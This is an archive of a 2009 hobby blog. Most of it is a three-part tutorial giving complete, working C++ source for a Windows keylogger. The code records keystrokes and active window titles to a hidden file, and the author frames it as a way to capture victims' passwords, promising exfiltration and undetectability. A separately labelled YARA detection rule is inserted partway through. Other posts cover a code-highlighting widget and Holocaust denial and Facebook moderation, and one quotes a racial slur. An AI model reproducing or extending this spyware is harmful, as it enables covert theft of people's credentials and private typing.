Holocaust denial started back in 1947, when the first war-crime trial was held. Pleading not guilty on the stand can be considered denial can't it? In fact, it was not just the perpetrators but throughout and after the war, the American people and government refused to believe that the holocaust was happening. Why? Because who can believe that man is capable of such inhumane crimes. However, Holocaust denial now is completely different. Now it is not a denial because you do not want to believe, but because you sympathize with the ideals. Does that mean you hate Jews? No. But to some extent, the very fact that you think they and other victims are capable of producing such fiction can be considered racism. Those are just my views. Disagree? Be sure to comment.

But how can someone deny something that so obviously happened. Well, holocaust denial supporters have 3 main claims that they believe debunks the entire "myth" of the holocaust.
- The Nazis never intended or made legislation to kill minorities
Nice try. Historical videos of Hitler's speeches long before video editing was even possible can be translated to show clear legislation, policy, and discourse against Jews.

- The Holocaust was Allied War propaganda to increase hatred of Germans and military size.
Nope. Historically, we have testimony from members of congress and the president at the time that they did not believe the holocaust and had no intention of helping those in need. Would the fabricators of a myth really let it fall away like that?

- The numbers are extremely exaggerated.
Even if we don't look at the so-called "controversial" directly holocaust related numbers based on German Documentation, just looking at demographics at the time, in all countries affected by the genocide, we can see the 6 million people vanished into thin air. You can deny the holocaust if you can provide another explanation for this. And no, it wasn't aliens ;].

So, the holocaust happened, and denying it is probably very disrespectful, hurtful, and just plain immoral to any survivors, the victims and a lot of other people who care.

But is this Facebook audible a play at morality, or is it just an expansion of the common capitalist agenda? Well, Facebook claims they took the groups down because of incessant racism and hate language in the posts. Okay, fair enough; they censor pornographic images and this is just as detrimental to the mentality of viewers. However, shouldn't this policy be universal? Does Facebook only decide to delete groups when it is a serious threat to their market value? Oh wait, they aren't public. But still, it appears that Facebook only deleted these groups so it would not lose any clicks to the annoying context-based ads that pop up on every page.

Oh, how could you say such a thing! Well, I can, so stop denying it like the Holocaust deniers and look at the facts. There are at least 17 KKK groups on Facebook; why haven't they been deleted? If Facebook is as politically centered as they claim to be, why haven't they clicked their magic mouse and erased all history of the Ku Klux Klan off their servers? Well, their terms of service, and they themselves, claim that they only delete content if it violates these terms, which include hate language and racism. So, I decided to look at the Ku Klux Klan group page. Sure, the description looks innocent enough, until it comes to the part about how all whites should have the right to own slaves, but even that is not as bad as what's to come. Then you scroll to the comments. Hundreds of non-sarcastic comments such as "I hate N_ggers" or "REDNECK POWER SLAVES FOR LIFE".

So Facebook, what are you going to say about that? I am fine with your policy against racism, but are you really against racism, or just against profit loss?

Oh and By the Way, for any KKK supporters reading this, "Redneck" is a derogatory term for people from the south which usually comes with the image of an unintelligent, uneducated, lazy person with a thick accent that nobody cares about. So next time, you may want to check your term usage.

But anyway, I really have no opinion on any of this; I just hate corporations that disguise their greed with morality, i.e. GREEN CAPITALISM.

And yes this post will be controversial, so COMMENT! I really want to hear what you have to say!

Monday, May 11, 2009

Adding source code to your blog with Sytax Highlighter 2.0

Well, many readers are emailing me asking a very good question. How do you add source code to your blog? Many of you would have noticed by now that adding code is a pain. Not only is it horribly formatted, but many characters like < and such are interpreted by the browser as html code and this screws up a lot of the formatting for the rest of the post. You end up in a state where you have to type it all over again!

The solution is two fold, first you have to fix the formatting, and next you have to fix the escaping characters like < .

So first let's start with the latter, the dreaded less-than sign, commonly written as < . WHOAAA! How did you do that without screwing up your post? Well, it's simple: some basic knowledge of HTML tells us that if we want the actual character < , we have to replace every instance of < in our code with &lt; (and, to be safe, & with &amp; and > with &gt;). This tells the browser's parser to treat it as a character, not as part of the markup. By the way, lt stands for Less Than.

Next, the slightly harder part: how do you format it in the boss way that all the code is formatted on my blog? Well, it's actually not my work at all; it's all thanks to our good friend Alex Gorbatchev, who coded this wonderful CSS and JavaScript tool called SyntaxHighlighter. To use SyntaxHighlighter, download the files from
http://alexgorbatchev.com/wiki/SyntaxHighlighter:Download and once you have them, upload the necessary files to your website (Blogger doesn't support uploads, so you can use Google Pages, which is also free), and then call them in your posts with the Edit HTML tab. Well, this is all fine and dandy, haha "dandy", what a corny word, but what if I am too lazy to upload files to a server?

Well, Mr. Gorbatchev has found a solution for that too. He has uploaded the files to his own server, so that we can just call those. So in the end it is quite simple. Here's a step by step process on how to get this set-up and how to use it.

1. Go to Layout and then Edit Html.

2. Now, very carefully (I suggest that you copy and paste the HTML into a txt file in case you mess it up), add the following lines after the tag "end outer wrapper".



<link href='http://alexgorbatchev.com/pub/sh/2.0.287/styles/shCore.css' rel='stylesheet' type='text/css'/>
<link href='http://alexgorbatchev.com/pub/sh/2.0.287/styles/shThemeMidnight.css' rel='stylesheet' type='text/css'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shCore.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushCpp.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushJScript.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushCss.js' type='text/javascript'/>
<script src='http://alexgorbatchev.com/pub/sh/2.0.287/scripts/shBrushJava.js' type='text/javascript'/>


<script type='text/javascript'>
SyntaxHighlighter.config.bloggerMode = true;
SyntaxHighlighter.ClipboardSwf = 'http://alexgorbatchev.com/pub/sh/2.0.287/scripts/clipboard.swf';
SyntaxHighlighter.all();
</script>

Note: You can also add additional languages by adding additional brushes. You have so far added C++, Java, JavaScript and CSS. Read the SyntaxHighlighter page here for more information on different brushes that you may want to add.

3. Save the template.

4. Now in a post, whenever you wish to add source code just type in:

<pre class ="brush:cpp">
//Code goes here
</pre>


You can replace the brush parameter with the type of code you want to type in for example "brush:java". Well, thats it, doesnt that make it so much easier and better looking to add source code to your blog? Thanks for reading and thanks to Mr. Gorbatchev for tearing down the wall, oops, making this possible. ;]

Sunday, May 10, 2009

More for Our C++ Keylogger - Special Characters

First of all, if you are new to this blog, be sure to check out the other two keylogger tutorials first because you will need those for this one, they are the posts before this and make sure you SUBSCRIBE so you wont miss the next one.


Well, I have two comments and 1 subscriber -_- not exactly what I was hoping for but hopefully this post will change your mind. The problem is that I only have so much to add, and after that only your requests can keep me going before I move on to a new project so please, COMMENT! and SUBSCRIBE!. By the way for those of you that dont know how to subscribe, if you are using Firefox, just use its inbuilt feed reader, otherwise download a free one. In fact, I am pretty sure that internet explorer has an inbuilt reader too. And if you can't or don't want to do this, atleast follow me on google (the last widget down on the sidebar), or COMMENT!

-------------------------------------------------------------------------------------

Anyway, so far for our keylogger, we have one that captures the keys and the window titles and stores them in a text file, well, if you guys tried it out, you would have noticed that the logs are still pretty incomprehensible. Characters like the Shift or Tab key are not getting caught so you can't really use the logger efficiently until you can do so. Today I will teach you not only how to catch all these characters, but also how to resolve shifting, or capitalizing of passwords/usernames etc.

There is only one new api that you have to learn for this tutorial
GetKeyState();

What! I thought we used that already?

Nope, we used GetAsyncKeyState() before. So what's the difference? There are many differences, especially in their return values, but for our purposes just remember this: GetKeyState() reports the key state as of the last message the calling thread retrieved, and its low-order bit tells you whether a key is toggled, like Num Lock or, most importantly, Caps Lock. GetAsyncKeyState() reports the physical state of the key at the moment of the call, with the high-order bit set if the key is currently down; it knows nothing about toggles.

You should also know how to use switch cases for they will prove handy.

So, we know that GetAsyncKeyState and GetKeyState, based on their MSDN pages, accept a virtual-key code. For the digits 0-9 and the letters A-Z the virtual-key code is the same as the ASCII code of the uppercase character, but most other keys (arrows, Caps Lock, the numeric keypad) have their own VK_ codes that are not ASCII at all. So far, our Logger function takes this value in char form and outputs it into a text file. So, what if we take this value and convert it to a readable form for all keys? That would work out well. Well, the first thing is to change the value in the Logger function to an int. You will see why later.
In addition, lets make things easier and change our key value to a string so that we can easily update it into the file and not have to worry about char size and such.

So once we do this we have:



void Logger()
{
string keyinstring = "";
int key;
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key) & 1) //"== 1" binds tighter than "&", so write it this way
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close();
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}


So now we have to write our convertkey method, which will return a string value that we can store with StoreKey(); But before we do that, let's change our StoreKey method so that it can accept strings instead of an int.

So we have:


void StoreKey(string key){
    ofstream storekey("C:\\storekey.txt", ios::app);
    storekey << key;
    storekey.close();
}


Now all we have to do is write our convertkey function. So, firstly we want the function to return a string and to accept an int as a parameter so we have:


string convertkey(int key){
    //converts the keys
    return string();
}


Whoa, whoa, whoa, all these strings have to come from somewhere. Well, you are right. We have to add:


#include <string>


to the includes at the top of our code.

Anyway, back to the convertkey method. How do we convert a key? It's easy: just take in a value and output the corresponding string, for example


string convertkey(int key){
    string keystring;
    switch(key)
    {
        case 8:
            keystring = "[DELETE]";
            break;
    }
    return keystring;
}


So what does this do? It takes in a decimal vkey, in this case 8, which corresponds to the Backspace key on your keyboard, and returns a string for you to store in your log; otherwise you would just have an unidentified character which neither you nor the computer can read. I am not going to bore you with all the switch cases that we need, so I will just give them to you. Note that I used a switch case instead of if/else because it's easier to add more as we go along. Here are the completed switch cases.


string convertkey(int key){
    string keystring;
    switch(key)
    {
        case 8 :
            keystring = "[/]";
            break;
        case 13 :
            keystring = "\n";
            break;
        case 32 :
            keystring = " ";
            break;
        case 190 :
            keystring = ".";
            break;
        case 110 :
            keystring = ".";
            break;
        case VK_CAPITAL :
            keystring = "[CAPS LOCK]";
            break;
        case VK_TAB :
            keystring = "[TAB]";
            break;
        case VK_CONTROL :
            keystring = "[CONTROL]";
            break;
        case VK_ESCAPE :
            keystring = "[ESCAPE]";
            break;
        case VK_DOWN :
            keystring = "[DOWN]";
            break;
        case VK_LEFT :
            keystring = "[LEFT]";
            break;
        case VK_RIGHT :
            keystring = "[RIGHT]";
            break;
        case VK_UP :
            keystring = "[UP]";
            break;
    }
    return keystring;
}



Note that in case 13, 13 is the corresponding value for the Enter key, so we have "\n", the newline character. Yay, we are done.

No we are not. Remember that we modified our Logger function to depend on this method for all the characters, special or not. This way we can resolve capitals and such. So, what do we do now? We have to find a way to resolve those. This is where GetKeyState(); comes into play: we can use it to check whether Caps Lock is on or not.

So now, our completed function; I commented the new parts to make them easier to understand. Remember, it looks like a lot of complicated numbers, but those are just decimal values representing the keys you type, lowercase or uppercase, special or not.


string convertkey(int key){
    string keystring;
    switch(key)
    {
        case 8 :
            keystring = "[/]";
            break;
        case 13 :
            keystring = "\n";
            break;
        case 32 :
            keystring = " ";
            break;
        case 190 :
            keystring = ".";
            break;
        case 110 :
            keystring = ".";
            break;
        case VK_CAPITAL :
            keystring = "[CAPS LOCK]";
            break;
        case VK_TAB :
            keystring = "[TAB]";
            break;
        case VK_CONTROL :
            keystring = "[CONTROL]";
            break;
        case VK_ESCAPE :
            keystring = "[ESCAPE]";
            break;
        case VK_DOWN :
            keystring = "[DOWN]";
            break;
        case VK_LEFT :
            keystring = "[LEFT]";
            break;
        case VK_RIGHT :
            keystring = "[RIGHT]";
            break;
        case VK_UP :
            keystring = "[UP]";
            break;
    }
    if(key >= 96 && key <= 105)
        keystring = key-48;   // numpad 0-9 (VK_NUMPAD0..9 are 96..105); minus 48 gives the ASCII digit
    else if (key > 47 && key < 60)
        keystring = key;      // top-row digits 48..57 are already their own ASCII codes
    if (key != VK_LBUTTON && key != VK_RBUTTON)   // mouse buttons are 1 and 2, so letters never hit this anyway
    {
        if (key > 64 && key < 91)   // 'A'..'Z'
        {
            if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
                keystring = key; //if its capital then stay
            else
            {
                key = key + 32; //if not shift the number to the lowercase value
                keystring = key;
            }
        }
    }
    return keystring;
}


Well there you have it, a function that can resolve special characters and shifting. Be sure to edit it to your needs. And now the complete source code so far.

----------------------------------------------------------------------------------

#include <windows.h>
#include <fstream>
#include <string>
#include <cstring>   // strcmp / strcpy

using namespace std;

string convertkey(int key){
    string keystring;
    switch(key)
    {
        case 8 :
            keystring = "[/]";
            break;
        case 13 :
            keystring = "\n";
            break;
        case 32 :
            keystring = " ";
            break;
        case 190 :
            keystring = ".";
            break;
        case 110 :
            keystring = ".";
            break;
        case VK_CAPITAL :
            keystring = "[CAPS LOCK]";
            break;
        case VK_TAB :
            keystring = "[TAB]";
            break;
        case VK_CONTROL :
            keystring = "[CONTROL]";
            break;
        case VK_ESCAPE :
            keystring = "[ESCAPE]";
            break;
        case VK_DOWN :
            keystring = "[DOWN]";
            break;
        case VK_LEFT :
            keystring = "[LEFT]";
            break;
        case VK_RIGHT :
            keystring = "[RIGHT]";
            break;
        case VK_UP :
            keystring = "[UP]";
            break;
    }
    if(key >= 96 && key <= 105)
        keystring = key-48;   // numpad 0-9 (VK_NUMPAD0..9 are 96..105); minus 48 gives the ASCII digit
    else if (key > 47 && key < 60)
        keystring = key;      // top-row digits 48..57 are already their own ASCII codes
    if (key != VK_LBUTTON && key != VK_RBUTTON)   // mouse buttons are 1 and 2, so letters never hit this anyway
    {
        if (key > 64 && key < 91)   // 'A'..'Z'
        {
            if (GetKeyState(VK_CAPITAL) | GetAsyncKeyState(VK_SHIFT))
                keystring = key; //if its capital then stay
            else
            {
                key = key + 32; //if not shift the number to the lowercase value
                keystring = key;
            }
        }
    }
    return keystring;
}

void StoreKey(string key){
    ofstream storekey("C:\\storekey.txt", ios::app);
    storekey << key;
    storekey.close();
}

void Logger()
{
    string keyinstring = "";
    int key;
    char currentwindowtitle[MAX_PATH];
    char newwindowtitle[MAX_PATH] = "";   // start empty so the first strcmp compares against a real string
    GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
    while(true)
    {
        Sleep(5);
        for(key = 8; key <= 256; key++)
        {
            if((GetAsyncKeyState(key) & 1) == 1)   // low bit: key was pressed since the last call
            {
                GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
                if (strcmp(newwindowtitle, currentwindowtitle) != 0)
                {
                    ofstream storekey("C:\\storekey.txt", ios::app);
                    storekey << endl << currentwindowtitle << endl;
                    storekey.close();
                    strcpy(newwindowtitle, currentwindowtitle);
                }
                keyinstring = convertkey(key);
                StoreKey(keyinstring);
            }
        }
    }
}

int main(){
    Logger();
    return 1;
}

--------------------------------------------------------------------------------
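From the defender's side, the build above leaves recognisable artefacts in the compiled binary: the hard-coded log path, the bracketed tag strings from convertkey, and the GetAsyncKeyState/GetForegroundWindow imports. The YARA rule below is an added example, not part of the original post; the rule name and metadata are my own, and it is a signature for this specific source, so a rebuild with a different path or tags will not match it.

```yara
import "pe"

rule Polling_Keylogger_StorekeyTxt
{
    meta:
        description = "Added example: artefacts of the GetAsyncKeyState polling keylogger built in this post"
        scope       = "Signature for this source only; strings and imports taken from the code above"

    strings:
        // log file path hard-coded in StoreKey() and Logger()
        $log_path = "C:\\storekey.txt" ascii
        // tag strings emitted by convertkey()
        $tag_caps = "[CAPS LOCK]" ascii
        $tag_tab  = "[TAB]" ascii
        $tag_ctrl = "[CONTROL]" ascii
        $tag_esc  = "[ESCAPE]" ascii

    condition:
        // PE file ('MZ' header) that imports the two polling APIs ...
        uint16(0) == 0x5A4D and
        pe.imports("user32.dll", "GetAsyncKeyState") and
        pe.imports("user32.dll", "GetForegroundWindow") and
        // ... and carries the log path plus at least two of the tags
        $log_path and 2 of ($tag_*)
}
```

The import pair alone is not a reliable indicator, since legitimate input-handling software uses the same calls; the string clauses are what keep the rule specific, and a variant that changes them needs a new rule.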

Be sure to SUBSCRIBE, COMMENT, and request new tutorials and features. Hope you enjoyed this and put it to good use ;]

-badfish303

Thursday, May 7, 2009

Adding to our C++ Keylogger (Window Text and Special Characters)

Well, for those of you who have tried it out so far: nobody subscribed =( but anyway I guess I am obligated to add more. Please, guys, subscribe and comment, otherwise I won't know if anyone is reading this.

---------------------------------------------------------------------------------

Anyways here goes.
So as of now we have a very simple keylogger: it takes in the keys that the victim types and outputs them to a specified file. There are many problems with this keylogger. I'll help you solve one of them with this post.

Firstly, you would have to go to the victim's computer to retrieve the file, and most of the time this isn't a possibility. Also, if you have tried the keylogger out, you would have noticed that it doesn't resolve many of the characters, like "Enter" and "Shift" and so on. The next post will deal with FTP uploading and resolving these characters, but this post will focus on a very important necessity for any keylogger: getting the window. The problem with many loggers is that you may have some passwords but you will never know what these passwords are for. For that, you need to be able to get the window text.

Also remember that if you get the window text for a browser, it also tells you what webpage they are on, e.g. Yahoo Mail, so this function can be very useful.

First, we have to familiarize ourselves with the APIs that will help us get the window text. They are pretty self explanatory really: GetWindowText(); and GetForegroundWindow();. The MSDN pages for both are as follows, respectively:
GetWindowText
GetForegroundWindow()

Okay, so after reading those we can see that GetForegroundWindow returns a handle to the foreground window, i.e. whatever window is selected. GetWindowText copies the text of the window into a buffer of a specified length.

So in order to get the window text of the foreground window all we would have to do would be:



void getwindow(){
    char window[MAX_PATH];
    HWND currentwindow;
    currentwindow = GetForegroundWindow();
    GetWindowText(currentwindow, window, sizeof(window));
}


So this simple method stores the foreground window in the handle "currentwindow" and then uses GetWindowText to fill the buffer window (sized with the sizeof operator) with the title of the current window. This is all good, but when it comes to implementing it in our keylogger, putting this into the main function will only get the window text once, at the start of the program. In contrast, putting it in the check-keys loop will get the window text and print it out every single time it goes through the loop, which means that your log will be flooded with the same window title.

However, what if we put it in the loop, but only print it if the window has changed?
In other words, why don't we check what the window is and then, if that changes, output the new window? That way we will have the names of all the windows that were typed into, and nothing more or less.

So let's modify our Logger function:



void Logger()
{
    int key;   // the loop variable is the virtual-key code, so it must be an int, not a char array
    char currentwindowtitle[MAX_PATH];
    char newwindowtitle[MAX_PATH] = "";   // start empty so the first strcmp compares against a real string
    GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
    while(true)
    {
        Sleep(5);
        for(key = 8; key <= 256; key++)
        {
            if((GetAsyncKeyState(key) & 1) == 1)   // low bit: key was pressed since the last call
            {
                GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
                if (strcmp(newwindowtitle, currentwindowtitle) != 0)
                {
                    ofstream storekey("C:\\storekey.txt", ios::app);
                    storekey << endl << currentwindowtitle << endl;
                    storekey.close();
                    strcpy(newwindowtitle, currentwindowtitle);
                }
                StoreKey(key);
            }
        }
    }
}


So let's have a look at what this code does differently from our old Logger() function. First, it initializes the currentwindowtitle variable with the current window. Then, every time it loops through, it checks whether the new window is the same as the old window, using the return value of the strcmp (string compare) function, and if it is different, it outputs to the logfile. It then updates newwindowtitle with the current title and does it all over again. So there we have it, a keylogger that can tell you exactly where your victim is typing their passwords etc. Have fun, and remember to subscribe and to comment. Remember, if you want to request any functionality for the logger or anything, COMMENT and recommend this site to all your friends! The next post will deal with some very exciting stuff, like sending you the logs, so remember to subscribe so you know when that comes out. Come on guys, show me some love. The following is the complete code of our keylogger so far.

---------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>
#include <cstring>   // strcmp / strcpy

using namespace std;

void StoreKey(char key){
    ofstream storekey("C:\\storekey.txt", ios::app);
    storekey << key;
    storekey.close();
}

void Logger()
{
    int key;   // virtual-key code being tested
    char currentwindowtitle[MAX_PATH];
    char newwindowtitle[MAX_PATH] = "";   // start empty so the first strcmp compares against a real string
    GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
    while(true)
    {
        Sleep(5);
        for(key = 8; key <= 256; key++)
        {
            if((GetAsyncKeyState(key) & 1) == 1)   // low bit: key was pressed since the last call
            {
                GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
                if (strcmp(newwindowtitle, currentwindowtitle) != 0)
                {
                    ofstream storekey("C:\\storekey.txt", ios::app);
                    storekey << endl << currentwindowtitle << endl;
                    storekey.close();
                    strcpy(newwindowtitle, currentwindowtitle);
                }
                StoreKey(key);
            }
        }
    }
}

int main(){
    Logger();
    return 1;
}


-------------------------------------------------------------------------------

Remember to subscribe and COMMENT if you want me to keep writing this. Thanks Guys.

-badfish303

Tuesday, May 5, 2009

Building a C++ Keylogger

Well, a lot of people have been asking me if there is such a thing as an undetectable keylogger, and after some quick searching I decided to code one myself. Here is the catch: first of all, I'm not going to give you the .exe, just the source; you can compile it yourself. Second of all, we are gonna do it one step at a time, one post at a time. But believe me, once we are through we will have a kickass keylogger.

Some features that we will go over:

- Sending logs via FTP
- Sending logs through email
- Running as a system process
- Running on startup
- Window titles and screenshots

What you will need:

- A basic knowledge of C++ (Very Basic)

- A compiler (I did these with Dev)
Here's the link to download Dev-C++: http://www.bloodshed.net/dev/devcpp.html
Scroll to the bottom and there is the download link.

- 10-15 minutes
- A mouse click to subscribe to my blog!

Firstly, we have to understand the 2 basic types of keyloggers:
- Userland based loggers that capture the current state of the keyboard
- Keyboard hooks, filter drivers, or rootkits, that actually intercept the signals

For all intents and purposes, a well coded hook can easily avoid detection, but well coded is very hard to do and to explain, and you can understand it much better if we start with the userland loggers, which can be just as effective.

How these loggers work:

Windows conveniently provides a very nice API which is always undetectable because, well, it's used for just about anything, including keyloggers. The API is called GetAsyncKeyState().
A quick MSDN search reveals that this function takes one value, the vkey or virtual key, an ASCII decimal or hex value which represents the key. The Windows headers also come with some predefined values, for example VK_SHIFT is the shift key, so you don't need the decimal value. Anyway, this function also returns whether or not the key is pressed down. Here's the MSDN link.

So, we can use GetAsyncKeyState to check whether the key is pressed down or not, well how does that help us log it? Well you have to walk before you can crawl so first lets add this to our code.


void Logger(){
    int key = 0;   // the virtual-key code we want to test
    GetAsyncKeyState(key);
}


Now's the fun part: if we can check if a key is pressed down, why don't we have the program check all the keys for whether they are pressed down? Then we will know which key to log. Sounds hard? Well no, it's not, at least not if we use loops.




void Logger() {
    int key;   // virtual-key code being tested (an int, so it can be the loop counter)
    while(true) {
        Sleep(5);
        for(key = 8; key <= 256; key++){
            if(GetAsyncKeyState(key)==-32767){   // 0x8001 as a signed short: down now and pressed since last call
                StoreKey(key);
            }
        }
    }
}




Let's analyze what this code does. First we start an infinite while loop. Inside the loop there is a for loop which cycles through all the common ASCII values and checks if they are being pressed down. If one is, it stores it in a file with the StoreKey function, which we will write next. In addition, there is also a Sleep(5); to make sure that this doesn't take up 100% of the CPU and attract the victim's attention.

Now for the store key function.



void StoreKey(char key){
    ofstream storekey("C:\\storekey.txt", ios::app);
    storekey << key;
    storekey.close();
}


This function opens a new ofstream, storekey, that points to a file named storekey.txt on the C drive; it then logs the key to that file and closes the file.

Well now for the complete code. Remember, if you liked this code and want more, remember to subscribe and comment! Come on guys, I need incentive to keep doing this.
THANKS

--------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>

using namespace std;

void StoreKey(char key){
    ofstream storekey("C:\\storekey.txt", ios::app);
    storekey << key;
    storekey.close();
}


void Logger() {
    int key;   // virtual-key code being tested (an int, so it can be the loop counter)
    while(true) {
        Sleep(5);
        for(key = 8; key <= 256; key++){
            if(GetAsyncKeyState(key)==-32767){   // 0x8001 as a signed short: down now and pressed since last call
                StoreKey(key);
            }
        }
    }
}

int main(){
    Logger();
    return 1;
}


-----------------------------------------------------------------------------------------------

That's it, a simple keylogger. Make sure you subscribe so you catch the next post; it will teach you how to catch all the special characters and maybe even how to send your log to yourself O.o Read! Comment! Subscribe!